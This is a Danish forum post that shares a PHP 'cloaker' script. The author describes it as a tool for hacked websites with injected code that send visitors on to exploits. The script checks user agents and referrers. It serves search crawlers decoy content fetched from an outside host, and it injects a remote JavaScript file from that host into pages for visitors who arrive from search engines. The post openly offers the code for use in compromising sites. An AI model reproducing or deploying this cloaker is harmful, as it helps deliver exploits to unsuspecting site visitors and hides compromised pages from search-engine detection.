08-09-2016, 13:18
Traffik Cloaking er når du viderestiller crawler/spider refferrers til deadends og det er noget som man gør hvis man har en side med en iframe som viderestiller til nogle exploits for ikke at få urene loads.
Jeg har skrevet denne cloaker og man kan så videre skrive på den, dette var en beta af min cloacker jeg har siden hen inkluderet forbindelse filtering og andet lækker
Dette er et yderst vigtigt redskab hvis du vil sortere din traffik fra feks. hackede hjemmeside som du har kode injekted.
Men at filter og blacklist iper/hostname/domains det kræver en kæmpe database og dem skaffer man sig over en længere periode, men i kan godt komme langt med mit script (-:
Jeg har skrevet denne cloaker og man kan så videre skrive på den, dette var en beta af min cloacker jeg har siden hen inkluderet forbindelse filtering og andet lækker
Dette er et yderst vigtigt redskab hvis du vil sortere din traffik fra feks. hackede hjemmeside som du har kode injekted.
<?php
/*
Cloaker | skrevet af acc3ss
*/
function isCrawler() {
$agent= strtolower($_SERVER['HTTP_USER_AGENT']);
if (!empty($agent)) {
$spiderSite= array(
"TencentTraveler",
"Baiduspider+",
"BaiduGame",
"Googlebot",
"msnbot",
"Sosospider+",
"Sogou web spider",
"ia_archiver",
"Yahoo! Slurp",
"YoudaoBot",
"Yahoo Slurp",
"MSNBot",
"Java (Often spam bot)",
"BaiDuSpider",
"Voila",
"Yandex bot",
"BSpider",
"twiceler",
"Sogou Spider",
"Speedy Spider",
"Google AdSense",
"Heritrix",
"Python-urllib",
"Alexa (IA Archiver)",
"Ask",
"Exabot",
"Custo",
"OutfoxBot/YodaoBot",
"yacy",
"SurveyBot",
"legs",
"lwp-trivial",
"Nutch",
"StackRambler","360",
"The web archive (IA Archiver)",
"Perl tool",
"MJ12bot",
"Netcraft",
"MSIECrawler",
"WGet tools",
"larbin",
"Fish search",
);
foreach($spiderSite as $val) {
$str = strtolower($val);
if (strpos($agent, $str) !== false) {
return true;
}
}
} else {
return false;
}
}
function isfromse() {
$agent= strtolower($_SERVER['HTTP_REFERER']);
if (!empty($agent)) {
$spiderSite= array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","youdao");
foreach($spiderSite as $val) {
$str = strtolower($val);
if (strpos($agent, $str) !== false) {
return true;
}
}
} else {
return false;
}
}
if (isCrawler()){
$trust_str = file_get_contents('http://www.yhabe.org/1.txt');
$nobody_str = file_get_contents('http://www.yhabe.org/2.html');
$nobody_str = str_replace('{期数}',$trust_str, $nobody_str);
ob_get_clean();
echo $nobody_str;
die();
}
if (isfromse()){
ob_get_clean();
echo '<script type="text/javascript" src="http://www.yhabe.org/3.js"></script>';
}
?>
Men at filter og blacklist iper/hostname/domains det kræver en kæmpe database og dem skaffer man sig over en længere periode, men i kan godt komme langt med mit script (-: